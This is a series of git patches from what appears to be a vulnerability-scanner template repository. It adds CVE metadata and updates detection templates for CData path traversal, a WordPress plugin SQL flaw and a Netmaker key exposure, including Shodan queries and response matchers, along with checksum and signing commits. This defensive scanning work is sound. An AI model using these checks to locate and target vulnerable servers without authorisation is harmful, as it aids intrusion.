response.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-1183.yaml"} {"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"} {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 6a5892da11..14bf5eec07 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -a601931b82eff7c0eb13a1a141ecdbcd +c00921b7455dc0164b91d29896a81273 From 06d6d0cd3ca9782dc93d717c4c9f87d3b9cef3d1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 05:53:52 +0000 Subject: [PATCH 0430/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 317ce76e92..e9b1d898f7 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2023/CVE-2023-2949.yaml' - 'http/cves/2023/CVE-2023-31446.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' + - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' From 4eef2d77d75a9bb9fe102a487fa40445a766f7c1 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 05:54:59 +0000 Subject: [PATCH 0431/1768] Auto Template Signing [Tue Apr 30 05:54:59 UTC 2024] :robot: --- http/cves/2024/CVE-2024-0235.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index ce1fdd8023..27b99e3c20 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -55,3 +55,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100dd24c1d6e69e4b09cfdd6e18d844c71fecf98df6be105ce2f3645b85146d64be0221009bd6cb83542aa43265c7f18b56ac9f07610b6cee11eafbf574dfb9dc05e30d88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 882265d02ff8bb9b42cae6fdf0bbaa1e4da46ee1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Apr 2024 11:30:51 +0530 Subject: [PATCH 0432/1768] Update CVE-2024-31849.yaml --- http/cves/2024/CVE-2024-31849.yaml | 20 +++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index b738778aa8..3342e3fd9c 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -1,7 +1,7 @@ id: CVE-2024-31849 info: - name: CData - Path Traversal + name: CData API Server < 23.4.8844 - Path Traversal author: DhiyaneshDK severity: critical description: | @@ -9,6 +9,7 @@ info: reference: - https://www.tenable.com/security/research/tra-2024-09 - https://www.cdata.com/kb/entries/jetty-cve-0324.rst + - https://nvd.nist.gov/vuln/detail/CVE-2024-31849 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -17,9 +18,9 @@ info: epss-score: 0.00044 epss-percentile: 0.09652 metadata: - shodan-query: title:"CData" verified: true max-request: 1 + shodan-query: title:"CData" tags: cve,cve2024,cdata,lfi http: @@ -31,18 +32,19 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - '"items":[{' + - ':"true"' + - 'notifyemail' + condition: and + - type: word part: header words: - 'application/json' - - type: word - part: body - words: - - '"items":' - - ':"true"' - condition: and - - type: status status: - 200 From 4148e480312c71506dc204738c1d7303758ac1cb Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 06:00:58 +0000 Subject: [PATCH 0433/1768] Auto Generated New Template Addition List [Tue Apr 30 06:00:58 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 43e99df060..c3e741f52e 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2023/CVE-2023-31446.yaml http/cves/2023/CVE-2023-4973.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml +http/cves/2024/CVE-2024-24131.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-32399.yaml http/default-logins/crushftp/crushftp-anonymous-login.yaml From aff7b77f9bfd4a3cf3fb6bd0ea9685720512e31d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 06:01:05 +0000 Subject: [PATCH 0434/1768] Auto Generated Templates Checksum [Tue Apr 30 06:01:05 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ae2587e892..ec17958124 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:093496181a54e1ca8a72dc3e80f1a16d953eba11 -cves.json-checksum.txt:82d1c1b8bbfab0b5f72989fb3c58fe16109c7de3 +cves.json:376a4fb16e0e5560501f236500da20e55cba057a +cves.json-checksum.txt:1481c0b530da1a9cc9964a07c30f33a0dda4b463 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3213,7 +3213,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 -http/cves/2024/CVE-2024-0235.yaml:010abffda64977fb58c3fb594b564f12171d1c40 +http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8 http/cves/2024/CVE-2024-0337.yaml:a0259282bfc67ee1b2339ea3af3bd295baa59cc3 http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8 @@ -3238,6 +3238,7 @@ http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 +http/cves/2024/CVE-2024-24131.yaml:c74d4cc93ae15fc75bb6e213fe1653117ae05446 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c @@ -8454,7 +8455,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:53fd62a047c9cc044de6df62e9cb652f87cfb071 +templates-checksum.txt:cac48c25e2154028bd07571d0f622ff6969ea4fa wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7eebcbb23d2870d1ac5b151110caca70d2ad1aa1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 06:01:44 +0000 Subject: [PATCH 0435/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e9b1d898f7..5e9eef231d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' + - 'http/cves/2024/CVE-2024-24131.yaml' - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' From 9999aa19ba9c18fd4feb6327662db9edb9c8f1c6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 06:02:46 +0000 Subject: [PATCH 0436/1768] Auto Template Signing [Tue Apr 30 06:02:46 UTC 2024] :robot: --- http/cves/2024/CVE-2024-24131.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml index 34b58aaa60..9cab50258d 100644 --- a/http/cves/2024/CVE-2024-24131.yaml +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -47,3 +47,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100a70e9370453935e96c9943ac035762c4f44bcaef30ad4b00ec48e58072ccfb00022100c2c66dd4e2b80a25bc7b8730d7f65343a45419533e5a521290e890f52352af77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 68ed03dfdb67462d5e326c03a5ec626623620a14 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 06:07:51 +0000 Subject: [PATCH 0437/1768] Auto Generated Templates Checksum [Tue Apr 30 06:07:51 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ec17958124..68ffc4793e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3238,7 +3238,7 @@ http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 -http/cves/2024/CVE-2024-24131.yaml:c74d4cc93ae15fc75bb6e213fe1653117ae05446 +http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c @@ -3254,6 +3254,7 @@ http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 +http/cves/2024/CVE-2024-31849.yaml:f1ca65f44e4d8230db595c413577f9a0f600ecdc http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-3273.yaml:ba09cef76e7e1002ae6d72d3d9b670f09562ca9b http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c @@ -8455,7 +8456,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cac48c25e2154028bd07571d0f622ff6969ea4fa +templates-checksum.txt:e8d30a1d77a3cc964d7d92fdd42a64095245f812 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 399a77df93e0ae2fd7b923a3d12b03ff3fd71565 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 06:08:00 +0000 Subject: [PATCH 0438/1768] Auto Generated New Template Addition List [Tue Apr 30 06:08:00 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c3e741f52e..ed992e098a 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml http/cves/2024/CVE-2024-24131.yaml http/cves/2024/CVE-2024-31621.yaml +http/cves/2024/CVE-2024-31849.yaml http/cves/2024/CVE-2024-32399.yaml http/default-logins/crushftp/crushftp-anonymous-login.yaml http/default-logins/crushftp/crushftp-default-login.yaml From 723df6bf4538f2852d0dfc6bb1db9b59f86e63d4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 06:08:40 +0000 Subject: [PATCH 0439/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5e9eef231d..d25b54bed4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -13,6 +13,7 @@ on: - 'http/cves/2024/CVE-2024-1183.yaml' - 'http/cves/2024/CVE-2024-24131.yaml' - 'http/cves/2024/CVE-2024-31621.yaml' + - 'http/cves/2024/CVE-2024-31849.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' - 'http/default-logins/crushftp/crushftp-default-login.yaml' From 11f0d07d1ca7cbea9437c34dfaf01f3cd85721ef Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 06:09:34 +0000 Subject: [PATCH 0440/1768] Auto Template Signing [Tue Apr 30 06:09:34 UTC 2024] :robot: --- http/cves/2024/CVE-2024-31849.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index 3342e3fd9c..a06173e8a8 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -48,3 +48,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402203fd50be1fcb931f42ea5bd6a0cd03d98f5a8eed134374d6988f80cc1fcb95ff802200a1b9c40d7c51f44193a0674840be4e38fdcd3feca29712ccffaf4aa7b77c240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7ceb8324ee102004d07fef38815ec44fada1bb08 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Apr 2024 11:40:10 +0530 Subject: [PATCH 0441/1768] Update CVE-2024-27956.yaml --- http/cves/2024/CVE-2024-27956.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml index eab63ad557..17ec90e38d 100644 --- a/http/cves/2024/CVE-2024-27956.yaml +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -13,6 +13,7 @@ info: - https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve - https://github.com/NaInSec/CVE-LIST - https://github.com/nomi-sec/PoC-in-GitHub + - https://nvd.nist.gov/vuln/detail/CVE-2024-27956 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L cvss-score: 9.9 @@ -42,4 +43,5 @@ http: - 'duration>=5' - 'status_code == 200' - 'contains(header, "application/csv")' + - 'contains_all(body, "DATE", "ACTION", "KEYWORD")' condition: and From ce40defe261b92df907236e0e9f23e720ed6cec9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Apr 2024 11:44:34 +0530 Subject: [PATCH 0442/1768] updated matcher --- http/cves/2023/CVE-2023-32077.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml index edd93e82cb..779bf77a5c 100644 --- a/http/cves/2023/CVE-2023-32077.yaml +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -20,7 +20,7 @@ info: vendor: gravitl product: netmaker shodan-query: html:"netmaker" - tags: cve,cve2023,info-key,netmaker + tags: cve,cve2023,info-key,netmaker,exposure http: - method: GET @@ -33,7 +33,7 @@ http: matchers: - type: dsl dsl: - - 'contains_all(body, "address", "network")' - 'status_code == 200' - 'contains(header, "application/json")' + - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")' condition: and From 4acfc7707e9d695ceb30eb8e5ecf01a18c1c24ac Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 06:15:08 +0000 Subject: [PATCH 0443/1768] Auto Generated New Template Addition List [Tue Apr 30 06:15:07 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ed992e098a..5285d14717 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/cves/2023/CVE-2023-4973.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml http/cves/2024/CVE-2024-24131.yaml +http/cves/2024/CVE-2024-27956.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-31849.yaml http/cves/2024/CVE-2024-32399.yaml From e429f1789cf79ed0b1f08f547037fbd8dcaa4758 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 06:15:13 +0000 Subject: [PATCH 0444/1768] Auto Generated Templates Checksum [Tue Apr 30 06:15:13 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 68ffc4793e..a6f5fef68c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3248,13 +3248,14 @@ http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 +http/cves/2024/CVE-2024-27956.yaml:108da71bd4bc4b5294620b62d73a1d1e147abede http/cves/2024/CVE-2024-28255.yaml:dd2f4a52d0d4f9af3c6a6fc10a917e99e8f0717d http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096 http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 -http/cves/2024/CVE-2024-31849.yaml:f1ca65f44e4d8230db595c413577f9a0f600ecdc +http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-3273.yaml:ba09cef76e7e1002ae6d72d3d9b670f09562ca9b http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c @@ -8456,7 +8457,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e8d30a1d77a3cc964d7d92fdd42a64095245f812 +templates-checksum.txt:85b44f9bd38cb140738a14ba674c83d77873c63d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 908afc07b081888446b3cea4dbd1323cb0e08d80 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 06:15:54 +0000 Subject: [PATCH 0445/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d25b54bed4..31fd4e2b94 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' - 'http/cves/2024/CVE-2024-24131.yaml' + - 'http/cves/2024/CVE-2024-27956.yaml' - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-31849.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' From 64232a2519eba043f27c85ab63830f6b881e213a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 06:16:52 +0000 Subject: [PATCH 0447/1768] Auto Template Signing [Tue Apr 30 06:16:52 UTC 2024] :robot: --- http/cves/2024/CVE-2024-27956.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml index 17ec90e38d..3c5c29ab95 100644 --- a/http/cves/2024/CVE-2024-27956.yaml +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -45,3 +45,4 @@ http: - 'contains(header, "application/csv")' - 'contains_all(body, "DATE", "ACTION", "KEYWORD")' condition: and +# digest: 4a0a0047304502201afc1791826e1697d3a3aa1c115b03d228037f7e7725cbc1dc25dc3f37fb6798022100d14a7854e82d1afb46b5a04a8b6c429cf8ab2b7ce9fe9c11967a23d4519f7986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 68a06fe0fe83d14322242fc0db20fd344a6f73c6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 06:17:24 +0000 Subject: [PATCH 0448/1768] Auto Generated New Template Addition List [Tue Apr 30 06:17:24 UTC 2024] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index 5285d14717..a5ac273ac9 100644 --- a/.new-additions +++ b/.new-additions @@ -21,6 +21,6 @@ http/exposed-panels/monitorr-panel.yaml http/exposed-panels/tixeo-panel.yaml http/misconfiguration/installer/sabnzbd-installer.yaml http/misconfiguration/titannit-web-exposure.yaml -http/vulnerabilities/titan/titannit-web-ssrf.yaml +http/vulnerabilities/titan/titannit-web-rce.yaml network/detection/aix-websm-detect.yaml network/detection/bluecoat-telnet-proxy-detect.yaml From 180be58be5269240d782585cf6c342ec0fd84556 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 06:17:31 +0000 Subject: [PATCH 0449/1768] Auto Generated Templates Checksum [Tue Apr 30 06:17:31 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a6f5fef68c..625fe9e29e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3248,7 +3248,7 @@ http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 -http/cves/2024/CVE-2024-27956.yaml:108da71bd4bc4b5294620b62d73a1d1e147abede +http/cves/2024/CVE-2024-27956.yaml:6642a8487441523926a0828c54b333ba9737522f http/cves/2024/CVE-2024-28255.yaml:dd2f4a52d0d4f9af3c6a6fc10a917e99e8f0717d http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096 http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 @@ -7938,7 +7938,7 @@ http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:03c2c45139f6ccce4cae1593fa60 http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:7f769d37fd1e99b8c707f15123f774320cc68a9c http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:293e13f7aa67bd4fab36c4174f5349acfcbc737b http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d829a9f8df913b7baf54effb4c7193d8 -http/vulnerabilities/titan/titannit-web-ssrf.yaml:2c3d9ff9f823bbe6b104a1b23105182fab34818c +http/vulnerabilities/titan/titannit-web-rce.yaml:953a07117e5186b03beaa4b0e1946575d0d99a6b http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:237187847805b1973d1d857e6d6d73a392456ad7 http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc @@ -8457,7 +8457,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:85b44f9bd38cb140738a14ba674c83d77873c63d +templates-checksum.txt:c02da6eec0dfb882033c3cdfb3c20de17abcc64a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 @@ -8610,7 +8610,7 @@ workflows/solarwinds-orion-workflow.yaml:ec752aa58a5ac649b124965ec1f663cb9f65277 